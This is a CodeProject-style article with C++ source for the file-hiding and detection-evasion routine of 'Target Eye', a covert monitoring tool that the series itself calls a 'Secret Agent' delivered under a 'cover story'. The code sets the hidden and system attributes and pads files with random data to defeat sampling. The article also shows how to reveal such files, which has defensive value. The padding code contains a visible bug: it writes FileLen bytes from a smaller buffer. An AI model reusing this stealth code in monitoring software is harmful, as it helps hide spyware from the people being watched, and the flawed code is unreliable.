This article explains how files are hidden and when, along with exposing how to reveal these hidden files. Target Eye uses a simple mechanism to hide files but the trick will work on most Windows users since the option to reveal these hidden files is not part of the default user interface of the Files Explorer, so even if the "Show Hidden Items" is checked, the Target Eye hidden files will not be revealed.
Introduction
This article is the sixth and last article in a series about the Target Eye Monitoring System, developed in 2000, and till 2010 when it was discontinued.
- The first article was about Target Eye's Auto Update mechanism, and how it is capable of checking for updates, downloading them when they are installing them and running them instead of the old version currently running, all of the above, with no end-user intervention.
- The second article was about the Target Eye's screen capturing mechanism, and how compact JPG files are created combining a reasonable image quality and a small footprint.
- The third article was about the Shopping List mechanism.
- The fourth article is about Keyboard capturing.
- The fifth article deals with the packaging used to let our Secret Agent in. In other words, how Target Eye can be used to wrap it with what we refer to as "cover story".
About this Article
The following article explains how files are hidden and when, along with exposing how to reveal these hidden files. Target Eye uses a simple mechanism to hide files but the trick will work on most Windows users since the option to reveal these hidden files is not part of the default user interface of the Files Explorer, so even if the "Show Hidden Items" is checked, the Target Eye hidden files will not be revealed.
Target Eye's TEHideFile() Function
The TEHideFile()
function is used to hide and unhide files as well as to change the size of a given file to a random size, making it harder to sample and detect it.
Usage
By looking at the Target Eye 2005 source code, the function is defined as follows:
BOOL TEHideFile(CString FileName,BOOL Hide,BOOL RandomSize)
FileName
= the full path and name of the file Hide
= tells the function whether to hide or reveal the file RandomSize
= tells the function whether to add "garbage" data to the file (without affecting the way it functions) whilst changing its size to a larger one.
How the Target Eye Files Becomes Hidden
Target Eye uses what seems to be an old fashioned approach. Instead of using Kernel (SSDT manipulation) or user level global hooking, it just creates a similar system file. Such an approach was useful in the old days of Windows XP. However, while testing it under Windows 7 and 8, one might realize that the hidden files are indeed hidden, even when the "Hidden Items" checkbox is checked.
The following screenshot illustrates the "Hidden Items" checkbox
:
As you can see, with the Windows 7 and 8 user interface, it is not straight forward to even realize that there are additional system files which are hidden, even after checking the "View Hidden Items". It is common sense to assume that after checking this checkbox, ALL files will be visible.
Well, that is not the case with the Target Eye hidden files. These will not be visible even when this option is checked.
That creates an opportunity to relatively hide files from most of the users without using all sort of hooks and Kernel level manipulations.
How Can These System Files Be Shown After All?
Well, here is exactly how.
- You need to open the Folder Options dialog, which can be done by finding it. When you use Windows 8 search, you need to search "All" and not only "Files", type "Show Hidden Folders" and press Enter.
- The Folder Options dialog will be shown:
You need to uncheck "Hide protected operating system files" and then press "Yes" when the warning below appears.
You will only then be able to see Target Eye hidden files...
The TEHideFile() Source Code
BOOL TEHideFile(CString FileName,BOOL Hide,BOOL RandomSize)
{
HANDLE g_hCapFile; DWORD dwBytes; ULONG FileLen; FileLen=GetFileLen(FileName); if(FileLen==0) return(FALSE); g_hCapFile=CreateFile((char *)FileName.GetBuffer(0),GENERIC_READ,NULL,NULL,
OPEN_ALWAYS,NULL,NULL);
if(g_hCapFile==INVALID_HANDLE_VALUE)
{
return(FALSE);
}
char *buffer=(char *)malloc(FileLen);
memset(buffer,'\0',FileLen);
ReadFile(g_hCapFile,buffer,FileLen,&dwBytes,NULL);
CloseHandle(g_hCapFile);
DeleteFile(FileName);
if(Hide)
g_hCapFile=CreateFile((char *)FileName.GetBuffer(0),GENERIC_WRITE,
FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,
FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM,NULL);
else
g_hCapFile=CreateFile((char *)FileName.GetBuffer(0),GENERIC_WRITE,0,
NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
if(g_hCapFile==INVALID_HANDLE_VALUE)
{
return(FALSE);
}
if(!(WriteFile(g_hCapFile,buffer,FileLen,&dwBytes,NULL)))
{
free(buffer);
CloseHandle(g_hCapFile);
return(FALSE);
}
if(RandomSize)
{
int x;
char *temp;
x=(int)((double)rand()/(double )RAND_MAX*8630.0)+3201; temp=(char *)malloc(x);
if(temp)
{
int i;
for(i=0;i<x;i++) *(temp+i)=(int)((double)rand()/
(double )RAND_MAX*((int)'z'-(int)'a'+1))+(int)'a';
if(!(WriteFile(g_hCapFile,temp,FileLen,&dwBytes,NULL)))
{
free(temp);
free(buffer);
CloseHandle(g_hCapFile);
return(FALSE);
}
free(temp);
}
}
free(buffer);
CloseHandle(g_hCapFile);
return(TRUE);
}
I have written GetFileLen()
to make it easier to measure a size of a given file:
ULONG GetFileLen(CString FileName)
{
DWORD dwBytes;
HANDLE g_hCapFile;
if(FileName=="") return(0);
g_hCapFile=CreateFile((char *)FileName.GetBuffer(0),GENERIC_READ,NULL,
NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM,NULL);
if(g_hCapFile==INVALID_HANDLE_VALUE)
return(0);
dwBytes=SetFilePointer(g_hCapFile,0,NULL,FILE_END);
CloseHandle(g_hCapFile);
return(dwBytes);
}
What About Global API Hooking?
To learn about Global API Hooking, I recommend reading the excellent article by ApriorIT: Easy way to set up global API hooks. If you are interested in Kernel level hiding, that can be done using Drivers. There are several techniques, among them SSDT/IDT tables manipulation. See this article for example or read this one about the SSDT.
History
- 15th June, 2014: Initial version
Michael Haephrati, CodeProject MVP 2013
©2000-2010 Target Eye LTD (UK)
All materials contained on this article are protected by International copyright law and may not be used, reproduced, distributed, transmitted, displayed, published or broadcast without the prior written permission given by Target Eye LTD (UK). You may not alter or remove any trademark, copyright or other notice from copies of the content.